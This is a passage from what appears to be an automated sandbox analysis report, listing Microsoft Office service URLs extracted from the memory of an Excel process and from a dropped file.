Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957568679.0000000013401000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965837750.0000000013402000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonSubstrateOfficeIntelligenceServicehttps:
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonh
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/review/queryrd
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxm
Source: EXCEL.EXE, 00000000.00000003.957609902.00000000133B4000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869052762.00000000133AF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965787422.00000000133B5000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812737746.00000000133AF000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13IdentityServicehttps://identity.
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://powerlift-frontdesk.acompli.net
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://powerlift.acompli.net4
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965819822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptioneventsMBI_SSLhttps://rpsticket.partnerservices.getmicr
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://roaming.edog.
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://settings.outlook.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://settings.outlook.comS
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workb
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://staging.cortana.ai
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.aiF
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://staging.cortana.airl
Source: EXCEL.EXE, 00000000.00000002.965471878.00000000131EE000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://store.office.cn/addinstemplate?2
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://store.office.de/addinstemplatek2
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/Todo-Internal.ReadWrite
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory5
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com/search/api/v2/initn
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.com0
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comG
Source: EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comP
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comU
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comV
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://substrate.office.comu
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://tasks.office.com
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://tasks.office.comsD
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp String found in binary or memory: https://tellmeservice.osi.office.netst
Source: EXCEL.EXE, 00000000.00000003.956277034.000000001341D000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.812788493.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869082822.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.869306077.00000000133F2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.965884152.0000000013428000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.957395069.0000000013426000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.870183051.0000000013400000.00000004.00000001.sdmp, 7C0D527C-5EBC-4E38-99DF-FD6E1F5E260F.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
